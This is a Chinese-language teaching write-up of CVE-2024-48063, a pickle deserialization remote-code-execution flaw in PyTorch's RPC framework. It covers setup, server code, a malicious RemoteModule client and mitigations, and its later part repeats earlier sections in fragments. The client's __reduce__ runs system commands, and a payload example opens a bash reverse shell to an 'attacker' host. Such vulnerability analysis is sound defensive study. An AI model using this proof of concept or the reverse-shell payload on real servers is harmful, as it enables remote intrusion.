PyTorch RPC框架反序列化RCE漏洞分析(CVE-2024-48063) 教学文档<\/h1>

漏洞概述<\/h2>
CVE-2024-48063是PyTorch分布式RPC框架中的一个反序列化远程代码执行(RCE)漏洞。该漏洞存在于PyTorch 2.4.1及之前版本中，攻击者可以通过构造恶意序列化数据在RPC服务端执行任意代码。<\/p>

漏洞原理<\/h2>

RPC框架工作机制<\/h3>

PyTorch的RPC(Remote Procedure Call)框架允许在不同进程或机器间进行远程调用。主要组件包括：<\/p>

rpc.init_rpc()<\/code> - 初始化RPC环境<\/li>
RemoteModule<\/code> - 远程模块调用<\/li>

序列化\/反序列化机制 - 用于数据传输<\/li>
<\/ul>
漏洞根源<\/h3>
漏洞源于PyTorch RPC框架在反序列化过程中未对__reduce__<\/code>方法进行适当过滤。Python的__reduce__<\/code>方法允许自定义对象的序列化\/反序列化行为，攻击者可利用此特性注入恶意代码。<\/p>
漏洞复现<\/h2>
环境搭建<\/h3>

使用conda创建虚拟环境：<\/li>
<\/ol>
conda create -n pytorch_rce python=<\/span>3.8
<\/span><\/span>conda activate pytorch_rce
<\/span><\/span><\/code><\/pre>
安装易受攻击的PyTorch版本：<\/li>
<\/ol>
pip install torch==<\/span>2.4.1
<\/span><\/span><\/code><\/pre>服务端代码 (server.py)<\/h3>
import<\/span> torch
<\/span><\/span>import<\/span> torch.distributed.rpc as<\/span> rpc
<\/span><\/span>
<\/span><\/span>def<\/span> run_server<\/span>():
<\/span><\/span>    # 初始化服务端RPC<\/span>
<\/span><\/span>    rpc.<\/span>init_rpc("server"<\/span>, rank=<\/span>0<\/span>, world_size=<\/span>2<\/span>)
<\/span><\/span>    # 等待客户端的远程调用<\/span>
<\/span><\/span>    rpc.<\/span>shutdown()
<\/span><\/span>
<\/span><\/span>if<\/span> __name__ ==<\/span> "__main__"<\/span>:
<\/span><\/span>    run_server()
<\/span><\/span><\/code><\/pre>恶意客户端代码 (client.py)<\/h3>
import<\/span> torch
<\/span><\/span>import<\/span> torch.distributed.rpc as<\/span> rpc
<\/span><\/span>from<\/span> torch.distributed.nn.api.remote_module import<\/span> RemoteModule
<\/span><\/span>import<\/span> torch.nn as<\/span> nn
<\/span><\/span>
<\/span><\/span># 定义包含恶意__reduce__的模型<\/span>
<\/span><\/span>class<\/span> MyModel<\/span>(nn.<\/span>Module):
<\/span><\/span>    def<\/span> __init__(self):
<\/span><\/span>        super(MyModel, self).<\/span>__init__()
<\/span><\/span>        self.<\/span>fc =<\/span> nn.<\/span>Linear(2<\/span>, 2<\/span>)
<\/span><\/span>    
<\/span><\/span>    # 恶意反序列化方法<\/span>
<\/span><\/span>    def<\/span> __reduce__<\/span>(self):
<\/span><\/span>        return<\/span> (__import__('os'<\/span>).<\/span>system, ("id;ls"<\/span>,))
<\/span><\/span>
<\/span><\/span>def<\/span> run_client<\/span>():
<\/span><\/span>    # 初始化客户端RPC<\/span>
<\/span><\/span>    rpc.<\/span>init_rpc("client"<\/span>, rank=<\/span>1<\/span>, world_size=<\/span>2<\/span>)
<\/span><\/span>    
<\/span><\/span>    # 创建远程模块触发漏洞<\/span>
<\/span><\/span>    remote_model =<\/span> RemoteModule("server"<\/span>, MyModel())
<\/span><\/span>
<\/span><\/span>if<\/span> __name__ ==<\/span> "__main__"<\/span>:
<\/span><\/span>    run_client()
<\/span><\/span><\/code><\/pre>攻击流程<\/h3>

攻击者启动恶意客户端<\/li>
客户端通过RPC框架向服务端发送包含恶意__reduce__<\/code>方法的模型<\/li>
服务端反序列化该模型时执行__reduce__<\/code>中定义的恶意代码<\/li>
系统命令被执行，实现RCE<\/li>
<\/ol>
漏洞分析<\/h2>
关键点<\/h3>


不安全的反序列化<\/strong>：PyTorch RPC框架使用Python的pickle进行对象序列化\/反序列化，但未对危险方法进行过滤<\/p>
<\/li>

__reduce__滥用<\/strong>：攻击者通过重写__reduce__<\/code>方法，在反序列化时执行任意代码<\/p>
<\/li>

权限上下文<\/strong>：代码在服务端进程权限下执行，可能导致严重危害<\/p>
<\/li>
<\/ol>
攻击向量<\/h3>

任意命令执行<\/li>
文件系统操作<\/li>
网络访问<\/li>
权限提升<\/li>
<\/ul>
防护措施<\/h2>
官方修复<\/h3>
升级到PyTorch 2.4.2或更高版本，官方已修复此漏洞。<\/p>
临时缓解方案<\/h3>


限制RPC服务访问：<\/p>

使用防火墙规则限制访问源<\/li>
启用认证机制<\/li>
<\/ul>
<\/li>

输入验证：<\/p>

实现自定义反序列化检查<\/li>
使用安全的白名单机制<\/li>
<\/ul>
<\/li>

最小权限原则：<\/p>

以低权限用户运行PyTorch服务<\/li>
使用容器化技术隔离环境<\/li>
<\/ul>
<\/li>
<\/ol>
深入技术细节<\/h2>
PyTorch RPC序列化流程<\/h3>

客户端调用RemoteModule<\/code>时，模型被pickle序列化<\/li>
数据通过RPC通道传输到服务端<\/li>
服务端使用pickle反序列化数据<\/li>
反序列化过程中调用__reduce__<\/code>方法<\/li>
<\/ol>
恶意payload构造<\/h3>
攻击者可以构造多种形式的__reduce__<\/code>方法：<\/p>
# 示例1: 执行系统命令<\/span>
<\/span><\/span>def<\/span> __reduce__<\/span>(self):
<\/span><\/span>    return<\/span> (os.<\/span>system, ("malicious_command"<\/span>,))
<\/span><\/span>
<\/span><\/span># 示例2: 反弹shell<\/span>
<\/span><\/span>def<\/span> __reduce__<\/span>(self):
<\/span><\/span>    return<\/span> (eval, ("__import__('os').system('bash -i >& \/dev\/tcp\/attacker\/4444 0>&1')"<\/span>,))
<\/span><\/span><\/code><\/pre>总结<\/h2>
CVE-2024-48063暴露了PyTorch RPC框架在安全设计上的缺陷，强调了在分布式系统中安全序列化的重要性。开发者应当：<\/p>

及时更新依赖库<\/li>
谨慎处理反序列化操作<\/li>
实施深度防御策略<\/li>
监控异常RPC活动<\/li>
<\/ol>
对于使用PyTorch分布式训练的用户，建议全面评估系统安全性并采取适当的防护措施。<\/p>

PyTorch RPC框架反序列化RCE漏洞分析(CVE-2024-48063) 教学文档<\/h1>

漏洞概述<\/h2> CVE-2024-48063是PyTorch分布式RPC框架中的一个反序列化远程代码执行(RCE)漏洞。该漏洞存在于PyTorch 2.4.1及之前版本中，攻击者可以通过构造恶意序列化数据在RPC服务端执行任意代码。<\/p>

漏洞原理<\/h2>

漏洞根源<\/h3> 漏洞源于PyTorch RPC框架在反序列化过程中未对__reduce__<\/code>方法进行适当过滤。Python的__reduce__<\/code>方法允许自定义对象的序列化\/反序列化行为，攻击者可利用此特性注入恶意代码。<\/p>

漏洞分析<\/h2>

防护措施<\/h2>

官方修复<\/h3> 升级到PyTorch 2.4.2或更高版本，官方已修复此漏洞。<\/p>

深入技术细节<\/h2>

漏洞概述<\/h2>
CVE-2024-48063是PyTorch分布式RPC框架中的一个反序列化远程代码执行(RCE)漏洞。该漏洞存在于PyTorch 2.4.1及之前版本中，攻击者可以通过构造恶意序列化数据在RPC服务端执行任意代码。<\/p>

漏洞根源<\/h3>
漏洞源于PyTorch RPC框架在反序列化过程中未对`reduce<\/code>方法进行适当过滤。Python的reduce<\/code>方法允许自定义对象的序列化\/反序列化行为，攻击者可利用此特性注入恶意代码。<\/p>`

官方修复<\/h3>
升级到PyTorch 2.4.2或更高版本，官方已修复此漏洞。<\/p>